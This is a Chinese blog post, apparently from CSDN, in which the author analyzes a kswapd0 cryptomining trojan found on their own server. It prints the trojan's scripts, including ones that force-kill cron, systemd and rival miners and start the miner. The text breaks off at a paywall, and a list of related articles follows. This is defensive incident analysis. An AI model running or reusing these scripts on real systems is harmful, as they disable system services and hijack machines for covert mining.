挖矿木马分析之肉鸡竟是我自己

最新推荐文章于 2024-07-31 10:47:30 发布
最新推荐文章于 2024-07-31 10:47:30 发布
阅读量1.4k 收藏 7
点赞数 5
分类专栏: web安全渗透 文章标签: docker 网络安全 信息安全 渗透测试 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Appleteachers/article/details/117259776
版权

之前服务器总是有一些异地登陆的告警信息,用代理就会这样,自己也没太在意。今天偶然间打开一看,发现如下提示!

接下来处理一下!

收集信息

finalshell登陆发现CPU占用率为100%
ps auxw|head -1;ps auxw|sort -rn -k3|head -10 查看CPU占用最多的前10个进程

罪魁祸首是第一个,其PID是3124。ls -ail /proc]/PID查看其绝对路径

.configrc文件内容如下(.configrc的名字是为了把自己和.config文件混淆)

先查看a文件

其中run文件内容如下:

#!/bin/bash
./stop
./init0
sleep 10
pwd > dir.dir
dir=$(cat dir.dir)
ARCH=`uname -m`
        if [ "$ARCH" == "i686" ]; then
                nohup ./anacron >>/dev/null &
        elif [ "$ARCH" == "x86_64" ];   then
                ./kswapd0
        fi #闭合if
echo $! > bash.pid #用来判断run是否执行过

其先执行stop,再执行init0,然后把当前的路径写到dir.dir。根据是86位还是64位,执行不同的程序。

dir.dir内容如下:

/root/.configrc/a

stop内容如下

#!/bin/sh

#cron守护周期性的执行任务
pkill -9 cron
killall -9 cron
kill -9 `ps x|grep cron|grep -v grep|awk '{print $1}'`>.proc

#删除自己冒充的对象
pkill -9 kswapd0
killall -9 kswapd0
kill -9 `ps x|grep kswapd0|grep -v grep|awk '{print $1}'`>.proc

#进程管理
pkill -9 systemd
killall -9 systemd
kill -9 `ps x|grep systemd|grep -v grep|awk '{print $1}'`>.proc

#动态链接加载
pkill -9 ld-linux
killall -9 ld-linux
kill -9 `ps x|grep ld-linux|grep -v grep|awk '{print $1}'`>.proc

#权限管理
pkill -9 Donald
killall -9 Donald
kill -9 `ps x|grep Donald|grep -v grep|awk '{print $1}'`>.proc

#与挖矿有关
pkill -9 xmr
killall -9 xmr
kill -9 `ps x|grep xmr|grep -v grep|awk '{print $1}'`>.proc

#服务器杀毒
pkill -9 xm64
killall -9 xm64
kill -9 `ps x|grep xm64|grep -v grep|awk '{print $1}'`>.proc
rm -rf .proc

init0内容如下。这个比较有趣,为了让自己有更多的资源,它先杀掉现有的挖矿进程。我谢谢你啊~

#!/bin/sh

##########################################################################################\
### A script for killing cryptocurrecncy miners in a Linux enviornment
### Provided with zero liability (!)
###
### Some of the malware used as sources for this tool:
### https://pastebin.com/pxc1sXYZ
### https://pastebin.com/jRerGP1u
### SHA256: 2e3e8f980fde5757248e1c72ab8857eb2aea9ef4a37517261a1b013e3dc9e3c4
##########################################################################################\

# Killing processes by name, path, arguments and CPU utilization
processes(){
        killme() {
          killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
        }

        killa() {
        what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
        }

        killa 34e2fg
        killme

        # Killing big CPU
        VAR=$(ps uwx|awk '{print $2":"$3}'| grep -v CPU)
        for word in $VAR
        do
          CPUUSAGE=$(echo $word|awk -F":" '{print $2}'|awk -F"." '{ print $1}')
          if [ $CPUUSAGE -gt 45 ]; then echo BIG $word; PID=$(echo $word | awk -F":" '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P "er/v5|34e2|Xtmp|wf32N4|moy5Me|ssh"|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;
        done

        killall \.Historys
        killall \.sshd
最低0.47元/天 解锁文章
个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施
chinassj的博客
04-09 892
以前玩过腾讯,阿里,华为的免费服务器,都是又卡又慢,身为22世纪祖国的花朵,经过知识付费的熏陶,我义无反顾的终止了我的白嫖行为,然而努力让自己变得更好的路上总是有各种坑。。。。 服务器背景: 操作环境背景: 操作系统:Windows 10 操作工具:xshell(Free for Home/school) 故事背景: 拿到服务器后,创建了一个普通用户:shaun ;密码:12345...
linux服务器沦陷为肉鸡的全过程
weixin_34356138的博客
04-26 457
服务器沦陷为肉鸡的原因: 服务器沦陷为肉鸡的根本原因为:strtus2框架漏洞,者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。相关链接如下:https://cwiki.apache.org/confluence/display/WW/S2-045?from=timeline&isappinstalled...
【Linux系统恶意代码】“亡命徒(Outlaw)僵尸网络” Kswapd0挖矿病毒的发现与清除
AGATHA_66的博客
01-11 1977
系统被SSH暴力破解后,攻击者会在系统目录下添加.configrc5文件夹,文件结构内容如下,名为“a”的文件夹下存放开源门罗币挖矿程序kswapd0(xmrig)和启动脚本,名为“b”的文件夹下存放后门程序run和执行脚本。执行stop脚本,睡眠10秒,列出当前工作的路径并输出到dir.dir的文件中,执行kswapd0挖矿程序,把最后运行的后台进程的PID写入到一个.pid文件中。
记录某次“有趣的“挖矿木马排查
最新发布
2301_80127209的博客
07-31 389
挖矿木马是一种恶意软件,它在用户不知情或未经同意的情况下,利用受害者的计算机资源进行加密货币挖矿。这类软件通过执行大量运算来挖掘数字货币,如比特币或门罗币等。挖矿木马通常通过漏洞利用、弱口令爆破或非法应用传播等手段植入用户的计算机系统中。
Linux下清除挖矿病毒
QZ9420的博客
03-07 967
登录用户系统,显示系统被爆破了33万次了,结果用户的服务器密码改的很简单,极大可能是被爆破成功了。执行top命令,显示 kswapd0 的CPU占用异常。记下该进程ID 5081。这些都是和病毒后台下载运行有关的,按 insert 键,进入编辑模式,全部清空。执行查找命令 find / -name kswapd0。再按":“后,出现提示符”:" ,输入wq 然后回车保存。查看服务器的任务计划 crontab -e。杀掉进行 kill -9 5081。用 rm -rf 命令逐条删除。
关于木马病毒kswapd0的处理
We choose to go to the moon in this decade and do the other things, not because they are easy, but beacase they are hard.
03-13 1635
关于木马病毒kswapd0的处理
记一次ubuntu虚拟机被挖矿木马攻击的过程
热门推荐
李迟的专栏
06-05 1万+
事由: 今天发现虚拟机有点卡,用 top 查看发现2个未知进程占用大量CPU,遂查,发现被挖矿木马攻击了。
禽流感危机下肉鸡产业市场状态分析——基于互联网大数据和MS-VAR模型.pdf
07-16
本文档标题《禽流感危机下肉鸡产业市场状态分析——基于互联网大数据和MS-VAR模型》表明,研究目的在于通过互联网大数据分析和MS-VAR(Markov-Switching Vector Autoregression,马尔可夫转换向量自回归模型)模型,...
工厂化肉鸡物联网饲养技术分析.docx
06-29
肉鸡是我国畜牧业主导产业,我国年出栏肉鸡 90 亿只左右,鸡肉产量约占肉类产量的 15%,肉鸡养殖业是规模化、集约化、组织化、市场化程度最高的产业之一,规模养殖比重达 85% 以上。但是,总体上肉鸡养殖仍以人力...
黄羽肉鸡价格走势分析.pdf
02-07
黄羽肉鸡是中国肉鸡市场中的一个重要类别,与白羽肉鸡共同构成了我国肉鸡行业的主体。根据描述,2016年中国专业型肉鸡出栏量达到了89.9亿羽,其中黄羽肉鸡出栏39.9亿羽,占比接近一半。黄羽肉鸡的肉产量为490.5万吨...
Linux系统 kswapd0进程对于CPU占有率高的情况下排查到黑客植入脚本
CXX88888888的博客
08-08 1119
1.就是跟着进程找找目录,然后杀进程,清目录2.清定时任务3.服务器的ftp端口最好别用22,密码尽量设置复杂点4.尽量用密钥连接服务器,最好别用账号密码连接5.封闭不使用的端口,做到用一个开一个(通过防火墙和安全组策略)6.密码增强复杂性7.及时修补系统和软件漏洞。
记服务器被挖矿的一次排查
FareBoy的博客
05-05 434
记服务器被挖矿的一次排查
关于kswapd0 CPU占用率高的问题,原来是被植入挖矿程序
Less Is More
05-06 1641
朋友做毕设购买了一个百度云服务器,偶然间登录上发现负载较高,购买的是低配版的虚拟服务器单核2G内存,想着答辩完后就释放掉 top看了下资源的使用情况发现有个进程使用率过高,猜想是中了木马 netstat -antpl 查看一下异常的进程 [root@instance-g0wuu7jx ~]# netstat -antlp|grep -e kswapd0 -e rsync tcp 0 0 172.16.0.4:43804 45.9.148.59:443
linux 系统被异地登录,cpu占用拉满100%
BiuBiu_Ka
06-04 571
命令,查看占用最高的是否kswapd0。记下该进程ID 5081。执行查找命令 find / -name kswapd0。再按":“后,出现提示符”:" ,输入wq 然后回车保存。这些都和病毒相关,按 任意字母键,进入编辑模式,全部清空。将结果中的每个地址都删除掉 示例如下。最后修改服务器密码,并重启。
玄机——第九章-查杀linux挖矿病毒 kswapd0(应急响应) wp
焦虑的焦虑
07-12 2331
第九章-kswapd0挖矿
Linux kill -9 {进程名称}
爱喝星冰乐的博客
09-04 4054
kill命令,使用进程名
kswapd0病毒处理
GeeLoong`s Blog
07-17 7402
kswapd0挖矿病毒
伪装为kswapd0进程的挖矿木马
分享身边生活经验blog
06-26 2499
一、起因 腾讯云给我发了几封邮件说我的服务器被木马攻击。 image.png 我打开服务器监控一看,闲置的服务器CPU飙升。 image.png 二、排查 2.1 首先查询CPU占用最多的3个进程 查使用内存最多的K个进程 方式一:ps -aux | sort -k3nr | head -K image.png sort参数说明: |选项 |说明 |—————|————————————————————————— |-n |依照数值的大小排序,不加-n按字符串大小
木马控制命令特征:原理、操作指令与危害分析
本文主要探讨了控制命令特征以及木马病毒的原理和特性分析。特洛伊木马,简称木马,是一种恶意软件,起源于古希腊特洛伊战争的传说,但现代的含义是远程控制工具。木马通过欺骗方式入侵用户的计算机,隐藏在系统中不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值